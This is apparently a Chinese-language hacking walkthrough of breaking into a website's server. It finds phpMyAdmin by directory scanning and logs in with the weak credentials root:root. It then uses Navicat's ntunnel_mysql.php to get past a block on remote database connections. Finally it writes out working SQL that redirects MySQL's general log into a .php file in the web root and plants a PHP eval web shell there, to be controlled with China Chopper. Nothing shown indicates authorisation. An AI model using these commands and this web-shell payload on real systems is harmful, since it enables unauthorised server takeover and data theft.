首先通過目錄掃描對某站進行掃描,發現存在phpmyadmin,嘗試弱口令root:root很幸運進去了
嘗試使用Navicate進行數據庫連接返回禁止遠程連接數據庫:
但是遠程命令執行發現本地3306端口時開放的,於是嘗試通過代理進行連接:
Navicat安裝目錄下上傳ntunnel_mysql.php文件(數據庫的代理腳本)到目標服務器任意web站點目錄(后面getshell后上傳的)
上傳到D:/phpStudy/WWW目錄進行訪問http://XXX/ntunnel_mysql.php 測試成功
進行測試連接:
(此時,在本地打開Navicat配置http連接,這里的通道地址就寫你上面訪問的那個url,說白點兒就是個代理端,勾上使用base64編碼,防止waf從中作祟,然后主機名寫localhost,賬號密碼寫lnmp01本地數據庫用戶的賬號即可,因為要連接lnmp01本地的mysql)
Phpmyadmin Get Shell:
利用日志文件
mysql 5.0版本以上會創建日志文件,修改日志的全局變量,也可以getshell。但是也要對生成的日志有可讀可寫的權限。
set global general_log = "ON"; #當開啟general時,所執行的sql語句都會出現在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所執行的sql語句就會對應生成進而getshell SET global general_log_file='D:/phpStudy/WWW/test1234.php'; #對應就會生成test1234.php文件 select '<?php eval($_POST[2019]);?>'; #將一句話木馬寫入test1234.php文件
菜刀連接:
